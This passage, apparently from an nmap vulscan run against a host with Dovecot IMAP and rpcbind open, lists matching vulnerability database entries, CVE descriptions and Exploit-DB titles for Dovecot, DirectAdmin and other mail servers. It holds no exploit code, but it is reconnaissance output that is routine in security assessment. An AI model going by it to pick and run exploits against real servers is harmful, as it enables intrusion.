11319| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
11320| [66522] FreeBSD Ports: dovecot
11321| [65010] Ubuntu USN-838-1 (dovecot)
11322| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
11323| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
11324| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
11325| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
11326| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
11327| [62854] FreeBSD Ports: dovecot-managesieve
11328| [61916] FreeBSD Ports: dovecot
11329| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
11330| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
11331| [60528] FreeBSD Ports: dovecot
11332| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
11333| [60089] FreeBSD Ports: dovecot
11334| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
11335| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
11336|
11337| SecurityTracker - https://www.securitytracker.com:
11338| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
11339| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
11340| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
11341| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
11342|
11343| OSVDB - http://www.osvdb.org:
11344| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
11345| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
11346| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
11347| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
11348| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
11349| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
11350| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
11351| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
11352| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
11353| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
11354| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
11355| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
11356| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
11357| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
11358| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
11359| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
11360| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
11361| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
11362| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
11363| [66113] Dovecot Mail Root Directory Creation Permission Weakness
11364| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
11365| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
11366| [66110] Dovecot Multiple Unspecified Buffer Overflows
11367| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
11368| [64783] Dovecot E-mail Message Header Unspecified DoS
11369| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
11370| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
11371| [62796] Dovecot mbox Format Email Header Handling DoS
11372| [61395] DirectAdmin Admin Account Creation CSRF
11373| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
11374| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
11375| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
11376| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
11377| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
11378| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
11379| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
11380| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
11381| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
11382| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
11383| [43137] Dovecot mail_extra_groups Symlink File Manipulation
11384| [42979] Dovecot passdbs Argument Injection Authentication Bypass
11385| [39876] Dovecot LDAP Auth Cache Security Bypass
11386| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
11387| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
11388| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
11389| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
11390| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
11391| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
11392| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
11393| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
11394| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
11395| [32673] DirectAdmin CMD_TICKET type Parameter XSS
11396| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
11397| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
11398| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
11399| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
11400| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
11401| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
11402| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
11403| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
11404| [23281] Dovecot imap/pop3-login dovecot-auth DoS
11405| [23280] Dovecot Malformed APPEND Command DoS
11406| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
11407| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
11408| [5857] Linux pop3d Arbitrary Mail File Access
11409| [2471] akpop3d username SQL Injection
11410|_
11411111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
11412| rpcinfo:
11413| program version port/proto service
11414| 100000 2,3,4 111/tcp rpcbind
11415|_ 100000 2,3,4 111/udp rpcbind
11416143/tcp open imap syn-ack Dovecot imapd
11417| vulscan: VulDB - https://vuldb.com:
11418| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
11419| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
11420| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
11421| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
11422| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
11423| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
11424| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
11425| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
11426| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
11427| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
11428| [69835] Dovecot 2.2.0/2.2.1 denial of service
11429| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
11430| [65684] Dovecot up to 2.2.6 unknown vulnerability
11431| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
11432| [63692] Dovecot up to 2.0.15 spoofing
11433| [7062] Dovecot 2.1.10 mail-search.c denial of service
11434| [59792] Cyrus IMAPd 2.4.11 weak authentication
11435| [57517] Dovecot up to 2.0.12 Login directory traversal
11436| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
11437| [57515] Dovecot up to 2.0.12 Crash denial of service
11438| [54944] Dovecot up to 1.2.14 denial of service
11439| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
11440| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
11441| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
11442| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
11443| [53277] Dovecot up to 1.2.10 denial of service
11444| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
11445| [45256] Dovecot up to 1.1.5 directory traversal
11446| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
11447| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11448| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11449| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
11450| [40356] Dovecot 1.0.9 Cache unknown vulnerability
11451| [38222] Dovecot 1.0.2 directory traversal
11452| [37927] Ipswitch Ipswitch Collaboration Suite up to 2006.1 IMAP Service imapd32.exe memory corruption
11453| [36376] Dovecot up to 1.0.x directory traversal
11454| [35759] Atrium MERCUR IMAPD IMAP4 mcrimap4.exe memory corruption
11455| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
11456| [30337] Cyrus IMAPD 2.3.2 Stack-based memory corruption
11457| [30268] Timo Sirainen Dovecot 1.0/1.0 Beta2/1.0 Beta3/1.0 Beta7 directory traversal
11458|
11459| MITRE CVE - https://cve.mitre.org:
11460| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
11461| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
11462| [CVE-2011-3481] The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
11463| [CVE-2011-3372] imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
11464| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
11465| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
11466| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
11467| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
11468| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
11469| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
11470| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11471| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11472| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
11473| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
11474| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
11475| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
11476| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
11477| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
11478| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
11479| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
11480| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
11481| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
11482| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
11483| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
11484| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
11485| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
11486| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
11487| [CVE-2007-5740] The format string protection mechanism in IMAPD for Perdition Mail Retrieval Proxy 1.17 and earlier allows remote attackers to execute arbitrary code via an IMAP tag with a null byte followed by a format string specifier, which is not counted by the mechanism.
11488| [CVE-2007-5018] Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.
11489| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
11490| [CVE-2007-3925] Multiple buffer overflows in the IMAP service (imapd32.exe) in Ipswitch IMail Server 2006 before 2006.21 allow remote authenticated users to execute arbitrary code via the (1) Search or (2) Search Charset command.
11491| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
11492| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
11493| [CVE-2007-1579] Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
11494| [CVE-2007-1578] Multiple integer signedness errors in the NTLM implementation in Atrium MERCUR IMAPD (mcrimap4.exe) 5.00.14, with SP4, allow remote attackers to execute arbitrary code via a long NTLMSSP argument that triggers a stack-based buffer overflow.
11495| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
11496| [CVE-2006-6762] The IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to cause a denial of service via an APPEND command with a single "(" (parenthesis) in the argument.
11497| [CVE-2006-6761] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via a long argument to the SUBSCRIBE command.
11498| [CVE-2006-6425] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.
11499| [CVE-2006-6424] Multiple buffer overflows in Novell NetMail before 3.52e FTF2 allow remote attackers to execute arbitrary code (1) by appending literals to certain IMAP verbs when specifying command continuation requests to IMAPD, resulting in a heap overflow
11500| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
11501| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
11502| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
11503| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
11504| [CVE-2005-2278] Stack-based buffer overflow in the IMAP daemon (imapd) in MailEnable Professional 1.54 allows remote authenticated users to execute arbitrary code via the status command with a long mailbox name.
11505| [CVE-2005-1256] Stack-based buffer overflow in the IMAP daemon (IMAPD32.EXE) in IMail 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allows remote authenticated users to execute arbitrary code via a STATUS command with a long mailbox name.
11506| [CVE-2005-1249] The IMAP daemon (IMAPD32.EXE) in Ipswitch Collaboration Suite (ICS) allows remote attackers to cause a denial of service (CPU consumption) via an LSUB command with a large number of null characters, which causes an infinite loop.
11507| [CVE-2005-1015] Buffer overflow in MailEnable Imapd (MEIMAP.exe) allows remote attackers to execute arbitrary code via a long LOGIN command.
11508| [CVE-2005-0546] Multiple buffer overflows in Cyrus IMAPd before 2.2.11 may allow attackers to execute arbitrary code via (1) an off-by-one error in the imapd annotate extension, (2) an off-by-one error in "cached header handling," (3) a stack-based buffer overflow in fetchnews, or (4) a stack-based buffer overflow in imapd.
11509| [CVE-2003-1322] Multiple stack-based buffer overflows in Atrium MERCUR IMAPD in MERCUR Mailserver before 4.2.15.0 allow remote attackers to execute arbitrary code via a long (1) EXAMINE, (2) DELETE, (3) SUBSCRIBE, (4) RENAME, (5) UNSUBSCRIBE, (6) LIST, (7) LSUB, (8) STATUS, (9) LOGIN, (10) CREATE, or (11) SELECT command.
11510| [CVE-2002-1782] The default configuration of University of Washington IMAP daemon (wu-imapd), when running on a system that does not allow shell access, allows a local user with a valid IMAP account to read arbitrary files as that user.
11511| [CVE-2002-1604] Multiple buffer overflows in HP Tru64 UNIX allow local and possibly remote attackers to execute arbitrary code via a long NLSPATH environment variable to (1) csh, (2) dtsession, (3) dxsysinfo, (4) imapd, (5) inc, (6) uucp, (7) uux, (8) rdist, or (9) deliver.
11512| [CVE-2002-0997] Buffer overflows in IMAP Agent (imapd) for Novell NetMail (NIMS) 3.0.3 before 3.0.3A allows remote attackers to cause a denial of service.
11513| [CVE-2002-0379] Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
11514| [CVE-2001-0691] Buffer overflows in Washington University imapd 2000a through 2000c could allow local users without shell access to execute code as themselves in certain configurations.
11515| [CVE-2000-0284] Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
11516| [CVE-1999-1557] Buffer overflow in the login functions in IMAP server (imapd) in Ipswitch IMail 5.0 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long user name or (2) a long password.
11517| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
11518| [CVE-1999-1224] IMAP 4.1 BETA, and possibly other versions, does not properly handle the SIGABRT (abort) signal, which allows local users to crash the server (imapd) via certain sequences of commands, which causes a core dump that may contain sensitive password information.
11519|
11520| SecurityFocus - https://www.securityfocus.com/bid/:
11521| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
11522| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
11523| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
11524| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
11525| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
11526| [84478] imapd CVE-1999-1224 Denial-Of-Service Vulnerability
11527| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
11528| [67306] Dovecot Denial of Service Vulnerability
11529| [65650] Eudora WorldMail imapd 'UID' Command Buffer Overflow Vulnerability
11530| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
11531| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
11532| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
11533| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
11534| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
11535| [51403] Eudora WorldMail imapd 'LIST' Command Buffer Overflow Vulnerability
11536| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
11537| [49949] Cyrus IMAPd NTTP Logic Error Authentication Bypass Vulnerability
11538| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
11539| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
11540| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
11541| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
11542| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
11543| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
11544| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
11545| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
11546| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
11547| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
11548| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
11549| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
11550| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
11551| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
11552| [26270] Perdition IMAPD __STR_VWRITE Remote Format String Vulnerability
11553| [25733] Mercury/32 IMAPD SEARCH Command Remote Stack Buffer Overflow Vulnerability
11554| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
11555| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
11556| [23058] Atrium Mercur IMapD NTLM Buffer Overflow Vulnerability
11557| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
11558| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
11559| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
11560| [17961] Dovecot Remote Information Disclosure Vulnerability
11561| [16672] Dovecot Double Free Denial of Service Vulnerability
11562| [15980] Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
11563| [15753] Ipswitch Collaboration Suite and IMail Server IMAPD LIST Command Denial Of Service Vulnerability
11564| [12636] Cyrus IMAPD Multiple Remote Buffer Overflow Vulnerabilities
11565| [11738] Cyrus IMAPD Multiple Remote Unspecified Vulnerabilities
11566| [11729] Cyrus IMAPD Multiple Remote Vulnerabilities
11567| [6298] Cyrus IMAPD Pre-Login Heap Corruption Vulnerability
11568| [4713] Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability
11569| [2856] Imapd 'Local' Buffer Overflow Vulnerabilities
11570| [1110] Univ. Of Washington imapd Buffer Overflow Vulnerabilities
11571| [502] NT IMail Imapd Buffer Overflow DoS Vulnerability
11572| [130] imapd Buffer Overflow Vulnerability
11573|
11574| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11575| [86382] Dovecot POP3 Service denial of service
11576| [84396] Dovecot IMAP APPEND denial of service
11577| [80453] Dovecot mail-search.c denial of service
11578| [71354] Dovecot SSL Common Name (CN) weak security
11579| [70325] Cyrus IMAPd NNTP security bypass
11580| [67675] Dovecot script-login security bypass
11581| [67674] Dovecot script-login directory traversal
11582| [67589] Dovecot header name denial of service
11583| [63267] Apple Mac OS X Dovecot information disclosure
11584| [62340] Dovecot mailbox security bypass
11585| [62339] Dovecot IMAP or POP3 denial of service
11586| [62256] Dovecot mailbox security bypass
11587| [62255] Dovecot ACL entry security bypass
11588| [60639] Dovecot ACL plugin weak security
11589| [57267] Apple Mac OS X Dovecot Kerberos security bypass
11590| [56763] Dovecot header denial of service
11591| [54363] Dovecot base_dir privilege escalation
11592| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
11593| [47526] UW-imapd rfc822_output_char() denial of service
11594| [46323] Dovecot dovecot.conf information disclosure
11595| [46227] Dovecot message parsing denial of service
11596| [45669] Dovecot ACL mailbox security bypass
11597| [45667] Dovecot ACL plugin rights security bypass
11598| [41085] Dovecot TAB characters authentication bypass
11599| [41009] Dovecot mail_extra_groups option unauthorized access
11600| [39342] Dovecot LDAP auth cache configuration security bypass
11601| [35767] Dovecot ACL plugin security bypass
11602| [34082] Dovecot mbox-storage.c directory traversal
11603| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
11604| [26536] Dovecot IMAP LIST information disclosure
11605| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
11606| [24709] Dovecot APPEND command denial of service
11607| [22629] RHSA-2005:408 updates for cyrus-imapd not installed
11608| [19460] Cyrus IMAP imapd buffer overflow
11609| [19455] Cyrus IMAP imapd extension off-by-one buffer overflow
11610| [18492] Novell NetMail IMAPD 101_mEna buffer overflow
11611| [10803] UW IMAP (wu-imapd) authenticated user buffer overflow
11612| [9238] UW IMAP (wu-imapd) could allow a remote attacker to access arbitrary files
11613| [9055] UW IMAP (wu-imapd) partial mailbox attributes to request buffer overflow
11614| [7345] Slackware Linux imapd and ipop3d core dump
11615| [573] Imapd denial of service
11616|
11617| Exploit-DB - https://www.exploit-db.com:
11618| [30724] Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability
11619| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
11620| [22061] Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability
11621| [21443] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2)
11622| [21442] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1)
11623| [19849] UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)
11624| [19848] UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)
11625| [19847] UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities
